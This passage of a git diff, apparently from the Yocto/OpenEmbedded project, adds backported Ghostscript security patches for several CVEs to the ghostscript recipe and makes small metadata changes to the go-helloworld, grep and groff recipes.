++    return gs_remove_control_path(mem, gs_permit_file_writing, f);
+ }
+ 
+ int
+-- 
+2.25.1 
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch
new file mode 100644
index 0000000000..f312f89e04
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch
@@ -0,0 +1,65 @@
+From 6643ff0cb837db3eade489ffff21e3e92eee2ae0 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Fri, 28 Jan 2022 08:21:19 +0000
+Subject: [PATCH] [PATCH] Bug 703902: Fix op stack management in
+ sampled_data_continue()
+
+Replace pop() (which does no checking, and doesn't handle stack extension
+blocks) with ref_stack_pop() which does do all that.
+
+We still use pop() in one case (it's faster), but we have to later use
+ref_stack_pop() before calling sampled_data_sample() which also accesses the
+op stack.
+
+Fixes:
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=34675
+
+Upstream-Status: Backported [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=2a3129365d3bc0d4a41f107ef175920d1505d1f7]
+CVE: CVE-2021-45949
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ psi/zfsample.c | 13 ++++++++-----
+ 1 file changed, 8 insertions(+), 5 deletions(-)
+
+diff --git a/psi/zfsample.c b/psi/zfsample.c
+index 0023fa4..f84671f 100644
+--- a/psi/zfsample.c
++++ b/psi/zfsample.c
+@@ -534,14 +534,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
+             data_ptr[bps * i + j] = (byte)(cv >> ((bps - 1 - j) * 8));	/* MSB first */
+     }
+     pop(num_out);		    /* Move op to base of result values */
+-
++    /* From here on, we have to use ref_stack_pop() rather than pop()
++       so that it handles stack extension blocks properly, before calling
++       sampled_data_sample() which also uses the op stack.
++    */
+     /* Check if we are done collecting data. */
+ 
+     if (increment_cube_indexes(params, penum->indexes)) {
+         if (stack_depth_adjust == 0)
+-            pop(O_STACK_PAD);	    /* Remove spare stack space */
++	    ref_stack_pop(&o_stack, O_STACK_PAD);         /* Remove spare stack space */
+         else
+-            pop(stack_depth_adjust - num_out);
++            ref_stack_pop(&o_stack, stack_depth_adjust - num_out);
+         /* Execute the closing procedure, if given */
+         code = 0;
+         if (esp_finish_proc != 0)
+@@ -554,11 +557,11 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
+             if ((O_STACK_PAD - stack_depth_adjust) < 0) {
+                 stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust);
+                 check_op(stack_depth_adjust);
+-                pop(stack_depth_adjust);
++		ref_stack_pop(&o_stack, stack_depth_adjust);
+             }
+             else {
+                 check_ostack(O_STACK_PAD - stack_depth_adjust);
+-                push(O_STACK_PAD - stack_depth_adjust);
++		ref_stack_push(&o_stack, O_STACK_PAD - stack_depth_adjust);
+                 for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
+                     make_null(op - i);
+             }
+-- 
+2.17.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch
new file mode 100644
index 0000000000..852f2459f7
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch
@@ -0,0 +1,54 @@
+From 37ed5022cecd584de868933b5b60da2e995b3179 Mon Sep 17 00:00:00 2001
+From: Ken Sharp <ken.sharp@artifex.com>
+Date: Fri, 24 Mar 2023 13:19:57 +0000
+Subject: [PATCH] Graphics library - prevent buffer overrun in (T)BCP encoding
+
+Bug #706494 "Buffer Overflow in s_xBCPE_process"
+
+As described in detail in the bug report, if the write buffer is filled
+to one byte less than full, and we then try to write an escaped
+character, we overrun the buffer because we don't check before
+writing two bytes to it.
+
+This just checks if we have two bytes before starting to write an
+escaped character and exits if we don't (replacing the consumed byte
+of the input).
+
+Up for further discussion; why do we even permit a BCP encoding filter
+anyway ? I think we should remove this, at least when SAFER is true.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;h=37ed5022cecd584de868933b5b60da2e995b3179]
+CVE: CVE-2023-28879
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/sbcp.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/base/sbcp.c b/base/sbcp.c
+index 6b0383c..90784b5 100644
+--- a/base/sbcp.c
++++ b/base/sbcp.c
+@@ -1,4 +1,4 @@
+-/* Copyright (C) 2001-2019 Artifex Software, Inc.
++/* Copyright (C) 2001-2023 Artifex Software, Inc.
+    All Rights Reserved.
+ 
+    This software is provided AS-IS with no warranty, either express or
+@@ -50,6 +50,14 @@ s_xBCPE_process(stream_state * st, stream_cursor_read * pr,
+         byte ch = *++p;
+ 
+         if (ch <= 31 && escaped[ch]) {
++            /* Make sure we have space to store two characters in the write buffer,
++	     * if we don't then exit without consuming the input character, we'll process
++	     * that on the next time round.
++	     */
++            if (pw->limit - q < 2) {
++                p--;
++                break;
++            }
+             if (p == rlimit) {
+                 p--;
+                 break;
+-- 
+2.25.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch
new file mode 100644
index 0000000000..a3bbe958eb
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch
@@ -0,0 +1,145 @@
+From 5e65eeae225c7d02d447de5abaf4a8e6d234fcea Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Wed, 7 Jun 2023 10:23:06 +0100
+Subject: [PATCH] Bug 706761: Don't "reduce" %pipe% file names for permission validation
+
+For regular file names, we try to simplfy relative paths before we use them.
+
+Because the %pipe% device can, effectively, accept command line calls, we
+shouldn't be simplifying that string, because the command line syntax can end
+up confusing the path simplifying code. That can result in permitting a pipe
+command which does not match what was originally permitted.
+
+Special case "%pipe" in the validation code so we always deal with the entire
+string.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=505eab7782b429017eb434b2b95120855f2b0e3c]
+CVE: CVE-2023-36664
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/gpmisc.c   | 31 +++++++++++++++++++--------
+ base/gslibctx.c | 56 ++++++++++++++++++++++++++++++++++++-------------
+ 2 files changed, 64 insertions(+), 23 deletions(-)
+
+diff --git a/base/gpmisc.c b/base/gpmisc.c
+index c4fffae..09ac6b3 100644
+--- a/base/gpmisc.c
++++ b/base/gpmisc.c
+@@ -1046,16 +1046,29 @@ gp_validate_path_len(const gs_memory_t *mem,
+              && !memcmp(path + cdirstrl, dirsepstr, dirsepstrl)) {
+           prefix_len = 0;
+     }
+-    rlen = len+1;
+-    bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path");
+-    if (bufferfull == NULL)
+-        return gs_error_VMerror;
+-
+-    buffer = bufferfull + prefix_len;
+-    if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
+-        return gs_error_invalidfileaccess;
+-    buffer[rlen] = 0;
+ 
++    /* "%pipe%" do not follow the normal rules for path definitions, so we
++       don't "reduce" them to avoid unexpected results
++     */
++    if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++	bufferfull = buffer = (char *)gs_alloc_bytes(mem->thread_safe_memory, len + 1, "gp_validate_path");
++	if (buffer == NULL)
++	    return gs_error_VMerror;
++	memcpy(buffer, path, len);
++	buffer[len] = 0;
++	rlen = len;
++    }
++    else {
++	rlen = len+1;
++	bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path");
++	if (bufferfull == NULL)
++	    return gs_error_VMerror;
++
++	buffer = bufferfull + prefix_len;
++	if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
++	    return gs_error_invalidfileaccess;
++	buffer[rlen] = 0;
++    }
+     while (1) {
+         switch (mode[0])
+         {
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index 20c5eee..355c0e3 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -719,14 +719,28 @@ gs_add_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const ch
+             return gs_error_rangecheck;
+     }
+ 
+-    rlen = len+1;
+-    buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gp_validate_path");
+-    if (buffer == NULL)
+-        return gs_error_VMerror;
++    /* "%pipe%" do not follow the normal rules for path definitions, so we
++       don't "reduce" them to avoid unexpected results
++     */
++    if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++	buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_add_control_path_len");
++	if (buffer == NULL)
++	    return gs_error_VMerror;
++	memcpy(buffer, path, len);
++	buffer[len] = 0;
++	rlen = len;
++    }
++    else {
++	rlen = len + 1;
+ 
+-    if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
+-        return gs_error_invalidfileaccess;
+-    buffer[rlen] = 0;
++	buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gs_add_control_path_len");
++	if (buffer == NULL)
++	    return gs_error_VMerror;
++
++	if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
++	    return gs_error_invalidfileaccess;
++	buffer[rlen] = 0;
++    }
+ 
+     n = control->num;
+     for (i = 0; i < n; i++)
+@@ -802,14 +816,28 @@ gs_remove_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const
+             return gs_error_rangecheck;
+     }
+ 
+-    rlen = len+1;
+-    buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gp_validate_path");
+-    if (buffer == NULL)
+-        return gs_error_VMerror;
++    /* "%pipe%" do not follow the normal rules for path definitions, so we
++       don't "reduce" them to avoid unexpected results
++     */
++    if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++	buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_remove_control_path_len");
++	if (buffer == NULL)
++	    return gs_error_VMerror;
++	memcpy(buffer, path, len);
++	buffer[len] = 0;
++	rlen = len;
++    }
++    else {
++	rlen = len+1;
+ 
+-    if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
+-        return gs_error_invalidfileaccess;
+-    buffer[rlen] = 0;
++	buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gs_remove_control_path_len");
++	if (buffer == NULL)
++	    return gs_error_VMerror;
++
++	if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
++	    return gs_error_invalidfileaccess;
++	buffer[rlen] = 0;
++    }
+ 
+     n = control->num;
+     for (i = 0; i < n; i++) {
+-- 
+2.25.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch
new file mode 100644
index 0000000000..e8c42f1deb
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch
@@ -0,0 +1,60 @@
+From fb342fdb60391073a69147cb71af1ac416a81099 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Wed, 14 Jun 2023 09:08:12 +0100
+Subject: [PATCH] Bug 706778: 706761 revisit
+
+Two problems with the original commit. The first a silly typo inverting the
+logic of a test.
+
+The second was forgetting that we actually actually validate two candidate
+strings for pipe devices. One with the expected "%pipe%" prefix, the other
+using the pipe character prefix: "|".
+
+This addresses both those.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=fb342fdb60391073a69147cb71af1ac416a81099]
+CVE: CVE-2023-36664
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/gpmisc.c   | 2 +-
+ base/gslibctx.c | 4 ++--
+ 2 files changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/base/gpmisc.c b/base/gpmisc.c
+index 09ac6b3..01d449f 100644
+--- a/base/gpmisc.c
++++ b/base/gpmisc.c
+@@ -1050,7 +1050,7 @@ gp_validate_path_len(const gs_memory_t *mem,
+     /* "%pipe%" do not follow the normal rules for path definitions, so we
+        don't "reduce" them to avoid unexpected results
+      */
+-    if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++    if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {
+ 	bufferfull = buffer = (char *)gs_alloc_bytes(mem->thread_safe_memory, len + 1, "gp_validate_path");
+ 	if (buffer == NULL)
+ 	    return gs_error_VMerror;
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index 355c0e3..d8f74a3 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -722,7 +722,7 @@ gs_add_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const ch
+     /* "%pipe%" do not follow the normal rules for path definitions, so we
+        don't "reduce" them to avoid unexpected results
+      */
+-    if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++    if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {
+ 	buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_add_control_path_len");
+ 	if (buffer == NULL)
+ 	    return gs_error_VMerror;
+@@ -819,7 +819,7 @@ gs_remove_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const
+     /* "%pipe%" do not follow the normal rules for path definitions, so we
+        don't "reduce" them to avoid unexpected results
+      */
+-    if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
++    if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {
+ 	buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_remove_control_path_len");
+ 	if (buffer == NULL)
+ 	    return gs_error_VMerror;
+-- 
+2.25.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch
new file mode 100644
index 0000000000..662736bb3d
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch
@@ -0,0 +1,62 @@
+From 4ceaf92815302863a8c86fcfcf2347e0118dd3a5 Mon Sep 17 00:00:00 2001
+From: Ray Johnston <ray.johnston@artifex.com>
+Date: Tue, 22 Sep 2020 13:10:04 -0700
+Subject: [PATCH] Fix gp_file allocations to use thread_safe_memory.
+
+The gpmisc.c does allocations for gp_file objects and buffers used by
+gp_fprintf, as well as gp_validate_path_len. The helgrind run with
+-dBGPrint -dNumRenderingThreads=4 and PCL input showed up the gp_fprintf
+problem since the clist rendering would call gp_fprintf using the same
+allocator (PCL's chunk allocator which is non_gc_memory). The chunk
+allocator is intentionally not thread safe (for performance).
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4ceaf92815302863a8c86fcfcf2347e0118dd3a5]
+CVE: CVE-2023-36664 #Dependency Patch1
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/gpmisc.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/base/gpmisc.c b/base/gpmisc.c
+index 34cd71f..c4fffae 100644
+--- a/base/gpmisc.c
++++ b/base/gpmisc.c
+@@ -435,7 +435,7 @@ generic_pwrite(gp_file *f, size_t count, gs_offset_t offset, const void *buf)
+ 
+ gp_file *gp_file_alloc(gs_memory_t *mem, const gp_file_ops_t *prototype, size_t size, const char *cname)
+ {
+-    gp_file *file = (gp_file *)gs_alloc_bytes(mem->non_gc_memory, size, cname ? cname : "gp_file");
++    gp_file *file = (gp_file *)gs_alloc_bytes(mem->thread_safe_memory, size, cname ? cname : "gp_file");
+     if (file == NULL)
+         return NULL;
+ 
+@@ -449,7 +449,7 @@ gp_file *gp_file_alloc(gs_memory_t *mem, const gp_file_ops_t *prototype, size_t
+         memset(((char *)file)+sizeof(*prototype),
+                0,
+                size - sizeof(*prototype));
+-    file->memory = mem->non_gc_memory;
++    file->memory = mem->thread_safe_memory;
+ 
+     return file;
+ }
+@@ -1047,7 +1047,7 @@ gp_validate_path_len(const gs_memory_t *mem,
+           prefix_len = 0;
+     }
+     rlen = len+1;
+-    bufferfull = (char *)gs_alloc_bytes(mem->non_gc_memory, rlen + prefix_len, "gp_validate_path");
++    bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path");
+     if (bufferfull == NULL)
+         return gs_error_VMerror;
+ 
+@@ -1093,7 +1093,7 @@ gp_validate_path_len(const gs_memory_t *mem,
+         break;
+     }
+ 
+-    gs_free_object(mem->non_gc_memory, bufferfull, "gp_validate_path");
++    gs_free_object(mem->thread_safe_memory, bufferfull, "gp_validate_path");
+ #ifdef EACCES
+     if (code == gs_error_invalidfileaccess)
+         errno = EACCES;
+-- 
+2.25.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch
new file mode 100644
index 0000000000..3acb8a503c
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch
@@ -0,0 +1,62 @@
+From 8b0f20002536867bd73ff4552408a72597190cbe Mon Sep 17 00:00:00 2001
+From: Ken Sharp <ken.sharp@artifex.com>
+Date: Thu, 24 Aug 2023 15:24:35 +0100
+Subject: [PATCH] IJS device - try and secure the IJS server startup
+
+Bug #707051 ""ijs" device can execute arbitrary commands"
+
+The problem is that the 'IJS' device needs to start the IJS server, and
+that is indeed an arbitrary command line. There is (apparently) no way
+to validate it. Indeed, this is covered quite clearly in the comments
+at the start of the source:
+
+ * WARNING: The ijs server can be selected on the gs command line
+ * which is a security risk, since any program can be run.
+
+Previously this used the awful LockSafetyParams hackery, which we
+abandoned some time ago because it simply couldn't be made secure (it
+was implemented in PostScript and was therefore vulnerable to PostScript
+programs).
+
+This commit prevents PostScript programs switching to the IJS device
+after SAFER has been activated, and prevents changes to the IjsServer
+parameter after SAFER has been activated.
+
+SAFER is activated, unless explicitly disabled, before any user
+PostScript is executed which means that the device and the server
+invocation can only be configured on the command line. This does at
+least provide minimal security against malicious PostScript programs.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=e59216049cac290fb437a04c4f41ea46826cfba5]
+CVE: CVE-2023-43115
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ devices/gdevijs.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/devices/gdevijs.c b/devices/gdevijs.c
+index 3d337c5..e50d69f 100644
+--- a/devices/gdevijs.c
++++ b/devices/gdevijs.c
+@@ -934,6 +934,9 @@ gsijs_finish_copydevice(gx_device *dev, const gx_device *from_dev)
+     static const char rgb[] = "DeviceRGB";
+     gx_device_ijs *ijsdev = (gx_device_ijs *)dev;
+ 
++    if (ijsdev->memory->gs_lib_ctx->core->path_control_active)
++	return_error(gs_error_invalidaccess);
++
+     code = gx_default_finish_copydevice(dev, from_dev);
+     if(code < 0)
+         return code;
+@@ -1363,7 +1366,7 @@ gsijs_put_params(gx_device *dev, gs_param_list *plist)
+     if (code >= 0)
+         code = gsijs_read_string(plist, "IjsServer",
+             ijsdev->IjsServer, sizeof(ijsdev->IjsServer),
+-            dev->LockSafetyParams, is_open);
++	    ijsdev->memory->gs_lib_ctx->core->path_control_active, is_open);
+ 
+     if (code >= 0)
+         code = gsijs_read_string_malloc(plist, "DeviceManufacturer",
+-- 
+2.25.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch b/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch
new file mode 100644
index 0000000000..77eec7d158
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch
@@ -0,0 +1,51 @@
+From 7861fcad13c497728189feafb41cd57b5b50ea25 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Fri, 12 Feb 2021 10:34:23 +0000
+Subject: [PATCH] oss-fuzz 30715: Check stack limits after function evaluation.
+
+During function result sampling, after the callout to the Postscript
+interpreter, make sure there is enough stack space available before pushing
+or popping entries.
+
+In thise case, the Postscript procedure for the "function" is totally invalid
+(as a function), and leaves the op stack in an unrecoverable state (as far as
+function evaluation is concerned). We end up popping more entries off the
+stack than are available.
+
+To cope, add in stack limit checking to throw an appropriate error when this
+happens.
+CVE: CVE-2021-45944
+Upstream-Status: Backported [https://git.ghostscript.com/?p=ghostpdl.git;a=patch;h=7861fcad13c497728189feafb41cd57b5b50ea25]
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ psi/zfsample.c | 14 +++++++++++---
+ 1 file changed, 11 insertions(+), 3 deletions(-)
+
+diff --git a/psi/zfsample.c b/psi/zfsample.c
+index 290809405..652ae02c6 100644
+--- a/psi/zfsample.c
++++ b/psi/zfsample.c
+@@ -551,9 +551,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
+     } else {
+         if (stack_depth_adjust) {
+             stack_depth_adjust -= num_out;
+-            push(O_STACK_PAD - stack_depth_adjust);
+-            for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
+-                make_null(op - i);
++            if ((O_STACK_PAD - stack_depth_adjust) < 0) {
++                stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust);
++                check_op(stack_depth_adjust);
++                pop(stack_depth_adjust);
++            }
++            else {
++                check_ostack(O_STACK_PAD - stack_depth_adjust);
++                push(O_STACK_PAD - stack_depth_adjust);
++                for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
++                    make_null(op - i);
++            }
+         }
+     }
+
+--
+2.25.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript_9.52.bb b/meta/recipes-extended/ghostscript/ghostscript_9.52.bb
index 65135f5821..e57f592892 100644
--- a/meta/recipes-extended/ghostscript/ghostscript_9.52.bb
+++ b/meta/recipes-extended/ghostscript/ghostscript_9.52.bb
@@ -19,6 +19,10 @@ DEPENDS_class-native = "libpng-native"
 UPSTREAM_CHECK_URI = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases"
 UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)\.tar"
 
+# The jpeg issue in the CVE is present in the gs jpeg sources
+# however we use an external jpeg which doesn't have the issue.
+CVE_CHECK_WHITELIST += "CVE-2013-6629"
+
 def gs_verdir(v):
     return "".join(v.split("."))
 
@@ -29,12 +33,24 @@ SRC_URI_BASE = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/d
                 file://do-not-check-local-libpng-source.patch \
                 file://avoid-host-contamination.patch \
                 file://mkdir-p.patch \
+                file://CVE-2020-15900.patch \
+                file://check-stack-limits-after-function-evalution.patch \
+                file://CVE-2021-45949.patch \
+                file://CVE-2021-3781_1.patch \
+                file://CVE-2021-3781_2.patch \
+                file://CVE-2021-3781_3.patch \
+                file://CVE-2023-28879.patch \
+                file://0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch \
+                file://CVE-2023-36664-pre1.patch \
+                file://CVE-2023-36664-1.patch \
+                file://CVE-2023-36664-2.patch \
+                file://CVE-2023-43115.patch \
+                file://CVE-2020-36773.patch \
 "
 
 SRC_URI = "${SRC_URI_BASE} \
            file://ghostscript-9.21-prevent_recompiling.patch \
            file://cups-no-gcrypt.patch \
-           file://CVE-2020-15900.patch \
            "
 
 SRC_URI_class-native = "${SRC_URI_BASE} \
diff --git a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
index ab70ea98a3..7d0f74186e 100644
--- a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
+++ b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "https://golang.org/"
 LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302"
 
-SRC_URI = "git://${GO_IMPORT}"
+SRC_URI = "git://${GO_IMPORT};branch=master"
 SRCREV = "46695d81d1fae905a270fb7db8a4d11a334562fe"
 UPSTREAM_CHECK_COMMITS = "1"
 
diff --git a/meta/recipes-extended/grep/grep_3.4.bb b/meta/recipes-extended/grep/grep_3.4.bb
index e176dd727b..46ac4cfb00 100644
--- a/meta/recipes-extended/grep/grep_3.4.bb
+++ b/meta/recipes-extended/grep/grep_3.4.bb
@@ -1,5 +1,6 @@
 SUMMARY = "GNU grep utility"
 HOMEPAGE = "http://savannah.gnu.org/projects/grep/"
+DESCRIPTION = "Grep searches one or more input files for lines containing a match to a specified pattern. By default, grep prints the matching lines."
 BUGTRACKER = "http://savannah.gnu.org/bugs/?group=grep"
 SECTION = "console/utils"
 LICENSE = "GPLv3"
diff --git a/meta/recipes-extended/groff/files/0001-Include-config.h.patch b/meta/recipes-extended/groff/files/0001-Include-config.h.patch
index 348a61d9df..46065bc513 100644
--- a/meta/recipes-extended/groff/files/0001-Include-config.h.patch
+++ b/meta/recipes-extended/groff/files/0001-Include-config.h.patch
@@ -17,6 +17,9 @@ In file included from TOPDIR/build/tmp/work/aarch64-yoe-linux-musl/groff/1.22.4-
   ^
 ./lib/math.h:40:1: error: unknown type name '_GL_INLINE_HEADER_BEGIN'
 
+We delete eqn.cpp and qen.hpp in do_configure
+to ensure they're regenerated and deterministic.
+
 Upstream-Status: Pending
 Signed-off-by: Khem Raj <raj.khem@gmail.com>
 ---
@@ -140,1029 +143,6 @@ index f95c05e..d875045 100644
  #include <string.h>
  #include <stdlib.h>
  
-diff --git a/src/preproc/eqn/eqn.cpp b/src/preproc/eqn/eqn.cpp
-index 4ede465..fdd9484 100644
---- a/src/preproc/eqn/eqn.cpp
-+++ b/src/preproc/eqn/eqn.cpp
-@@ -1,8 +1,9 @@
--/* A Bison parser, made by GNU Bison 3.2.  */
-+/* A Bison parser, made by GNU Bison 3.4.1.  */
- 
- /* Bison implementation for Yacc-like parsers in C
- 
--   Copyright (C) 1984, 1989-1990, 2000-2015, 2018 Free Software Foundation, Inc.
-+   Copyright (C) 1984, 1989-1990, 2000-2015, 2018-2019 Free Software Foundation,
-+   Inc.
- 
-    This program is free software: you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-@@ -47,7 +48,7 @@
- #define YYBISON 1
- 
- /* Bison version.  */
--#define YYBISON_VERSION "3.2"
-+#define YYBISON_VERSION "3.4.1"
- 
- /* Skeleton name.  */
- #define YYSKELETON_NAME "yacc.c"
-@@ -65,7 +66,11 @@
- 
- 
- /* First part of user prologue.  */
--#line 18 "../src/preproc/eqn/eqn.ypp" /* yacc.c:338  */
-+#line 18 "src/preproc/eqn/eqn.ypp"
-+
-+#if HAVE_CONFIG_H
-+# include <config.h>
-+#endif
- 
- #include <stdio.h>
- #include <string.h>
-@@ -77,7 +82,8 @@ extern int non_empty_flag;
- int yylex();
- void yyerror(const char *);
- 
--#line 81 "src/preproc/eqn/eqn.cpp" /* yacc.c:338  */
-+#line 86 "src/preproc/eqn/eqn.cpp"
-+
- # ifndef YY_NULLPTR
- #  if defined __cplusplus
- #   if 201103L <= __cplusplus
-@@ -98,8 +104,8 @@ void yyerror(const char *);
- # define YYERROR_VERBOSE 0
- #endif
- 
--/* In a future release of Bison, this section will be replaced
--   by #include "y.tab.h".  */
-+/* Use api.header.include to #include this header
-+   instead of duplicating it here.  */
- #ifndef YY_YY_SRC_PREPROC_EQN_EQN_HPP_INCLUDED
- # define YY_YY_SRC_PREPROC_EQN_EQN_HPP_INCLUDED
- /* Debug traces.  */
-@@ -237,10 +243,9 @@ extern int yydebug;
- 
- /* Value type.  */
- #if ! defined YYSTYPE && ! defined YYSTYPE_IS_DECLARED
--
- union YYSTYPE
- {
--#line 30 "../src/preproc/eqn/eqn.ypp" /* yacc.c:353  */
-+#line 34 "src/preproc/eqn/eqn.ypp"
- 
- 	char *str;
- 	box *b;
-@@ -249,9 +254,9 @@ union YYSTYPE
- 	int n;
- 	column *col;
- 
--#line 253 "src/preproc/eqn/eqn.cpp" /* yacc.c:353  */
--};
-+#line 258 "src/preproc/eqn/eqn.cpp"
- 
-+};
- typedef union YYSTYPE YYSTYPE;
- # define YYSTYPE_IS_TRIVIAL 1
- # define YYSTYPE_IS_DECLARED 1
-@@ -366,6 +371,8 @@ typedef short yytype_int16;
- #endif
- 
- 
-+#define YY_ASSERT(E) ((void) (0 && (E)))
-+
- #if ! defined yyoverflow || YYERROR_VERBOSE
- 
- /* The parser invokes alloca or malloc; define the necessary symbols.  */
-@@ -508,16 +515,16 @@ union yyalloc
- /* YYNSTATES -- Number of states.  */
- #define YYNSTATES  142
- 
--/* YYTRANSLATE[YYX] -- Symbol number corresponding to YYX as returned
--   by yylex, with out-of-bounds checking.  */
- #define YYUNDEFTOK  2
- #define YYMAXUTOK   315
- 
-+/* YYTRANSLATE(TOKEN-NUM) -- Symbol number corresponding to TOKEN-NUM
-+   as returned by yylex, with out-of-bounds checking.  */
- #define YYTRANSLATE(YYX)                                                \
-   ((unsigned) (YYX) <= YYMAXUTOK ? yytranslate[YYX] : YYUNDEFTOK)
- 
- /* YYTRANSLATE[TOKEN-NUM] -- Symbol number corresponding to TOKEN-NUM
--   as returned by yylex, without out-of-bounds checking.  */
-+   as returned by yylex.  */
- static const yytype_uint8 yytranslate[] =
- {
-        0,     2,     2,     2,     2,     2,     2,     2,     2,    63,
